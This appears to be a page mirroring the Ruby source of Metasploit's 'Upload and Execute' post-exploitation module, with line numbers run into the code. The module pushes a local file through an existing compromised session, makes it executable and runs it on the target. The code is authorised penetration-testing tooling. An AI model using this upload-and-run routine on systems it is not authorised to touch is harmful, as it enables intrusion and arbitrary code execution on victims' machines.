Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/multi/manage/upload_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Exploit::FileDropper89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Upload and Execute',14'Description' => %q{Push a file and execute it.},15'Author' => 'egypt',16'License' => MSF_LICENSE,17'Platform' => ['win', 'unix', 'linux', 'osx', 'bsd', 'solaris'],18'SessionTypes' => ['meterpreter', 'shell']19)20)2122register_options([23OptPath.new('LPATH', [true, 'Local file path to upload and execute']),24OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']),25OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']),26OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 60])27])28end2930def run31print_status("Uploading #{lpath} to #{rpath}")32upload_file(rpath, lpath)33register_file_for_cleanup(rpath)3435if session.platform == 'windows'36# Don't use cmd.exe /c start so we can fetch output37cmd = rpath38else39# Set 700 so only we can execute the file40chmod(rpath, 0o700)4142# Handle absolute paths43cmd = rpath.start_with?('/') ? rpath : "./#{rpath}"44end4546print_status("Executing command: #{cmd}")47output = cmd_exec(cmd, args, timeout)4849if output.blank?50print_status('Command returned no output')51else52print_line(output)53end54end5556def lpath57datastore['LPATH']58end5960def rpath61datastore['RPATH'].blank? ? File.basename(lpath) : datastore['RPATH']62end6364def args65datastore['ARGS']66end6768def timeout69datastore['TIMEOUT']70end71end727374